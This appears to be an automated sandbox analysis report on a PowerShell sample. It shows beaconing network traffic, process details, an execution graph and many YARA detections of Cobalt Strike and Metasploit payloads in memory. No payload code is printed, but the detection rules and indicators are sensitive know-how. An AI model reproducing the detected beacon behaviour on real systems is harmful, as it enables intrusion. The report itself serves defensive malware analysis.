                                                                                      Oct 26, 2024 13:47:24.212502003 CEST4435023720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:25.513972998 CEST4435023720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:25.514153957 CEST50237443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.514153957 CEST50237443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.514758110 CEST50238443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.514797926 CEST4435023820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:25.514863968 CEST50238443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.514923096 CEST50238443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.514964104 CEST4435023820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:25.515011072 CEST50238443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.618954897 CEST50239443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.618992090 CEST4435023920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:25.619071960 CEST50239443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.619297028 CEST50239443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.619307995 CEST4435023920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:25.820051908 CEST50237443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:25.820063114 CEST4435023720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:26.900438070 CEST4435023920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:26.900568008 CEST50239443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:26.900784016 CEST50239443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:26.900795937 CEST4435023920.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:26.901459932 CEST50240443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:26.901484966 CEST4435024020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:26.901552916 CEST50240443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:26.901757002 CEST50240443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:26.901770115 CEST4435024020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:28.210264921 CEST4435024020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:28.210473061 CEST50240443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:28.210560083 CEST50240443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:28.210582018 CEST4435024020.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:28.211266994 CEST50241443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:28.211299896 CEST4435024120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:28.211410999 CEST50241443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:28.211483955 CEST50241443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:28.211500883 CEST4435024120.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:28.211544037 CEST50241443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:28.321105957 CEST50242443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:28.321141958 CEST4435024220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:28.321239948 CEST50242443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:28.321552992 CEST50242443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:28.321568012 CEST4435024220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:29.616611958 CEST4435024220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:29.616847038 CEST50242443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:29.617556095 CEST50242443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:29.617556095 CEST50243443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:29.617568016 CEST4435024220.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:29.617599010 CEST4435024320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:29.617711067 CEST50243443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:29.618079901 CEST50243443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:29.618093014 CEST4435024320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:30.934320927 CEST4435024320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:30.934504986 CEST50243443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:30.934504986 CEST50243443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:30.934978008 CEST50244443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:30.935030937 CEST4435024420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:30.935122967 CEST50244443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:30.935159922 CEST50244443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:30.935209990 CEST4435024420.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:30.935286045 CEST50244443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:31.039675951 CEST50245443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:31.039733887 CEST4435024520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:31.039899111 CEST50245443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:31.040297031 CEST50245443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:31.040312052 CEST4435024520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:31.242120981 CEST50243443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:31.242161036 CEST4435024320.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:32.343127012 CEST4435024520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:32.345455885 CEST50245443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:32.345455885 CEST50245443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:32.345900059 CEST50246443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:32.345921993 CEST4435024620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:32.346009016 CEST50246443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:32.346240997 CEST50246443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:32.346251011 CEST4435024620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:32.648190022 CEST50245443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:32.648221970 CEST4435024520.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:33.621022940 CEST4435024620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:33.621146917 CEST50246443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:33.626507044 CEST50246443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:33.626538992 CEST4435024620.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:33.627120018 CEST50247443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:33.627170086 CEST4435024720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:33.627245903 CEST50247443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:33.627283096 CEST50247443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:33.627360106 CEST4435024720.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:33.627413034 CEST50247443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:33.744064093 CEST50248443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:33.744169950 CEST4435024820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:33.744311094 CEST50248443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:33.744519949 CEST50248443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:33.744550943 CEST4435024820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:35.043286085 CEST4435024820.25.126.96192.168.2.6
                                                                                      Oct 26, 2024 13:47:35.043395996 CEST50248443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:37.057184935 CEST50248443192.168.2.620.25.126.96
                                                                                      Oct 26, 2024 13:47:37.057259083 CEST4435024820.25.126.96192.168.2.6

                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:07:43:28
                                                                                      Start date:26/10/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1"
                                                                                      Imagebase:0x7ff6e3d50000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4602998708.000001A6ED0B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                      • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                                                      • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                      • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                                                      • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4595950980.000001A6E4B7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                                      • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                      • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:1
                                                                                      Start time:07:43:28
                                                                                      Start date:26/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff66e660000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:0.5%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:13.5%
                                                                                        Total number of Nodes:170
                                                                                        Total number of Limit Nodes:5
                                                                                        execution_graph 44466 1a6ed2f88d4 44467 1a6ed2f8961 44466->44467 44470 1a6ed2f96b4 44467->44470 44469 1a6ed2f8a8f 44473 1a6ed2f9723 44470->44473 44471 1a6ed2f994f 44471->44469 44472 1a6ed2f976e LoadLibraryA 44472->44473 44473->44471 44473->44472 44474 1a6ed331218 44479 1a6ed331184 CryptAcquireContextA 44474->44479 44477 1a6ed331245 44480 1a6ed3311e6 CryptGenRandom 44479->44480 44481 1a6ed3311c2 CryptAcquireContextA 44479->44481 44483 1a6ed3311fd CryptReleaseContext 44480->44483 44484 1a6ed3311fb 44480->44484 44481->44480 44482 1a6ed33120c 44481->44482 44482->44477 44485 1a6ed3310d0 GetSystemTimeAsFileTime clock 44482->44485 44483->44482 44484->44483 44485->44477 44486 1a6ed351b48 44487 1a6ed351b64 44486->44487 44489 1a6ed351b69 44486->44489 44500 1a6ed3592d0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId __security_init_cookie 44487->44500 44490 1a6ed351bf4 44489->44490 44497 1a6ed351bbe 44489->44497 44501 1a6ed3519e8 44489->44501 44490->44497 44546 1a6ed3493e0 44490->44546 44492 1a6ed351c12 44493 1a6ed351c3b 44492->44493 44496 1a6ed3493e0 _DllMainCRTStartup 133 API calls 44492->44496 44495 1a6ed3519e8 _CRT_INIT 44 API calls 44493->44495 44493->44497 44495->44497 44498 1a6ed351c2e 44496->44498 44499 1a6ed3519e8 _CRT_INIT 44 API calls 44498->44499 44499->44493 44500->44489 44502 1a6ed351a77 44501->44502 44507 1a6ed3519fa _heap_init 44501->44507 44503 1a6ed351acd 44502->44503 44512 1a6ed351a7b _CRT_INIT 44502->44512 44504 1a6ed351ad2 44503->44504 44505 1a6ed351b30 44503->44505 44584 1a6ed3540a8 TlsGetValue 44504->44584 44515 1a6ed351a03 _CRT_INIT 44505->44515 44585 1a6ed355808 5 API calls 2 library calls 44505->44585 44507->44515 44562 1a6ed3559b0 9 API calls 7 library calls 44507->44562 44512->44515 44580 1a6ed34ff6c 6 API calls 2 library calls 44512->44580 44513 1a6ed351aa3 44525 1a6ed351ab2 _CRT_INIT 44513->44525 44581 1a6ed35816c 5 API calls 2 library calls 44513->44581 44514 1a6ed351a0f _RTC_Initialize 44514->44515 44520 1a6ed351a1f GetCommandLineA 44514->44520 44515->44490 44519 1a6ed351aad 44582 1a6ed355a30 TlsFree _mtterm 44519->44582 44563 1a6ed35937c 20 API calls 4 library calls 44520->44563 44525->44515 44583 1a6ed355a30 TlsFree _mtterm 44525->44583 44526 1a6ed351a31 44564 1a6ed357e40 44526->44564 44531 1a6ed351a3d 44533 1a6ed351a48 44531->44533 44534 1a6ed351a41 44531->44534 44576 1a6ed358ee0 28 API calls 3 library calls 44533->44576 44575 1a6ed355a30 TlsFree _mtterm 44534->44575 44538 1a6ed351a4d 44544 1a6ed351a61 44538->44544 44577 1a6ed35919c 27 API calls 4 library calls 44538->44577 44541 1a6ed351a56 44541->44544 44578 1a6ed3500ec 31 API calls 4 library calls 44541->44578 44542 1a6ed351a75 44542->44534 44545 1a6ed351a65 44544->44545 44579 1a6ed35816c 5 API calls 2 library calls 44544->44579 44545->44515 44547 1a6ed3494bb 44546->44547 44550 1a6ed349402 _DllMainCRTStartup 44546->44550 44655 1a6ed34b47c 44547->44655 44549 1a6ed349407 _DllMainCRTStartup 44549->44492 44550->44549 44557 1a6ed349465 _DllMainCRTStartup 44550->44557 44674 1a6ed34d4d8 NtQueryVirtualMemory _RTC_GetSrcLine _DllMainCRTStartup 44550->44674 44553 1a6ed349448 44554 1a6ed349457 44553->44554 44555 1a6ed34949f 44553->44555 44553->44557 44554->44557 44675 1a6ed34d2ec VirtualFree _DllMainCRTStartup 44554->44675 44556 1a6ed3494a9 44555->44556 44555->44557 44677 1a6ed34d134 NtUnmapViewOfSection _DllMainCRTStartup 44556->44677 44599 1a6ed33ca74 44557->44599 44560 1a6ed349487 44560->44557 44676 1a6ed34d2ec VirtualFree _DllMainCRTStartup 44560->44676 44562->44514 44563->44526 44565 1a6ed357e6f 44564->44565 44586 1a6ed354728 44565->44586 44567 1a6ed357e93 _ioinit 44567->44531 44568 1a6ed3580a3 GetStdHandle 44570 1a6ed358058 _ioinit 44568->44570 44569 1a6ed354728 _calloc_crt 5 API calls 44571 1a6ed357e83 _ioinit 44569->44571 44570->44567 44570->44568 44573 1a6ed3580fe InitializeCriticalSectionAndSpinCount 44570->44573 44571->44567 44571->44569 44571->44570 44574 1a6ed357f74 _ioinit 44571->44574 44572 1a6ed358006 InitializeCriticalSectionAndSpinCount 44572->44574 44573->44570 44574->44570 44574->44572 44576->44538 44577->44541 44578->44544 44579->44542 44580->44513 44581->44519 44585->44515 44587 1a6ed35474d _realloc_crt 44586->44587 44589 1a6ed35478a 44587->44589 44590 1a6ed359cec 44587->44590 44589->44571 44591 1a6ed359d01 44590->44591 44594 1a6ed359d1e _chsize_nolock 44590->44594 44592 1a6ed359d0f 44591->44592 44591->44594 44597 1a6ed351d18 5 API calls _getptd_noexit 44592->44597 44595 1a6ed359d14 44594->44595 44598 1a6ed351db4 DecodePointer 44594->44598 44595->44587 44597->44595 44598->44594 44678 1a6ed345fec 20 API calls 4 library calls 44599->44678 44601 1a6ed33ca92 _DllMainCRTStartup 44679 1a6ed34f284 44601->44679 44603 1a6ed33cb40 _DllMainCRTStartup 44695 1a6ed34c230 29 API calls 6 library calls 44603->44695 44605 1a6ed33cb87 44696 1a6ed3434a0 27 API calls 2 library calls 44605->44696 44607 1a6ed33cb94 44697 1a6ed34eaa8 21 API calls 3 library calls 44607->44697 44609 1a6ed33cbb5 44698 1a6ed34eaa8 21 API calls 3 library calls 44609->44698 44611 1a6ed33cbcf _DllMainCRTStartup 44613 1a6ed33cbdd _DllMainCRTStartup 44611->44613 44699 1a6ed34da74 14 API calls 3 library calls 44611->44699 44614 1a6ed33cbf9 44613->44614 44700 1a6ed34da74 14 API calls 3 library calls 44613->44700 44701 1a6ed33f1f8 36 API calls _DllMainCRTStartup 44614->44701 44617 1a6ed33cc05 44618 1a6ed33cc0e 44617->44618 44702 1a6ed34da74 14 API calls 3 library calls 44617->44702 44703 1a6ed33f274 38 API calls 5 library calls 44618->44703 44621 1a6ed33cc13 44623 1a6ed33cc1c _DllMainCRTStartup 44621->44623 44704 1a6ed34da74 14 API calls 3 library calls 44621->44704 44624 1a6ed34f284 malloc 20 API calls 44623->44624 44625 1a6ed33cc4f 44624->44625 44626 1a6ed33cc5c _DllMainCRTStartup 44625->44626 44705 1a6ed34da74 14 API calls 3 library calls 44625->44705 44706 1a6ed34eaa8 21 API calls 3 library calls 44626->44706 44629 1a6ed33cc78 _DllMainCRTStartup 44707 1a6ed345c60 55 API calls 3 library calls 44629->44707 44716 1a6ed345fec 20 API calls 4 library calls 44655->44716 44657 1a6ed34b4a0 _recalloc _DllMainCRTStartup 44658 1a6ed34f284 malloc 20 API calls 44657->44658 44659 1a6ed34b52d _recalloc 44658->44659 44717 1a6ed34eaa8 21 API calls 3 library calls 44659->44717 44661 1a6ed34b55e _DllMainCRTStartup 44666 1a6ed34b575 _DllMainCRTStartup 44661->44666 44718 1a6ed33f014 44661->44718 44663 1a6ed34b5d7 GetComputerNameExA 44664 1a6ed34b5ff _DllMainCRTStartup 44663->44664 44665 1a6ed34b611 GetComputerNameA 44664->44665 44672 1a6ed34b634 __crtGetEnvironmentStringsW _DllMainCRTStartup 44664->44672 44723 1a6ed34baa8 _DllMainCRTStartup 44665->44723 44666->44663 44666->44664 44668 1a6ed34b802 44725 1a6ed3460e0 5 API calls 2 library calls 44668->44725 44671 1a6ed34f284 malloc 20 API calls 44671->44672 44672->44668 44672->44671 44724 1a6ed34eaa8 21 API calls 3 library calls 44672->44724 44674->44553 44675->44560 44676->44557 44677->44557 44678->44601 44680 1a6ed34f318 44679->44680 44693 1a6ed34f29c _chsize_nolock 44679->44693 44714 1a6ed351db4 DecodePointer 44680->44714 44682 1a6ed34f31d 44715 1a6ed351d18 5 API calls _getptd_noexit 44682->44715 44683 1a6ed34f2b4 44683->44693 44708 1a6ed351df0 19 API calls 2 library calls 44683->44708 44709 1a6ed351e64 19 API calls 6 library calls 44683->44709 44710 1a6ed34ff54 GetModuleHandleExW __crtCorExitProcess _amsg_exit 44683->44710 44686 1a6ed34f30d 44686->44603 44688 1a6ed34f2fd 44712 1a6ed351d18 5 API calls _getptd_noexit 44688->44712 44692 1a6ed34f302 44713 1a6ed351d18 5 API calls _getptd_noexit 44692->44713 44693->44683 44693->44686 44693->44688 44693->44692 44711 1a6ed351db4 DecodePointer 44693->44711 44695->44605 44696->44607 44697->44609 44698->44611 44701->44617 44703->44621 44706->44629 44708->44683 44709->44683 44711->44693 44712->44692 44713->44686 44714->44682 44715->44686 44716->44657 44717->44661 44726 1a6ed33f118 44718->44726 44720 1a6ed33f02f _DllMainCRTStartup 44721 1a6ed33f058 WSAIoctl 44720->44721 44722 1a6ed33f051 _DllMainCRTStartup 44720->44722 44721->44722 44722->44666 44723->44672 44724->44672 44727 1a6ed33f12c _DllMainCRTStartup 44726->44727 44730 1a6ed33f144 _DllMainCRTStartup 44726->44730 44728 1a6ed33f1d2 WSACleanup 44727->44728 44727->44730 44729 1a6ed33f1e2 _DllMainCRTStartup 44728->44729 44730->44720

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Crypt$Context$Acquire$RandomRelease
                                                                                        • String ID: ($Microsoft Base Cryptographic Provider v1.0
                                                                                        • API String ID: 685801729-4046902070
                                                                                        • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                                                                        • Instruction ID: 0b7b5c252243d6ba2b2591747701b4bd1936978a6e9436d114156d827ae70310
                                                                                        • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                                                                        • Instruction Fuzzy Hash: C1019239715A40C2F720CFA9E98839DB7A1F7EAB84F498025C65983365DF78C54DC741

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
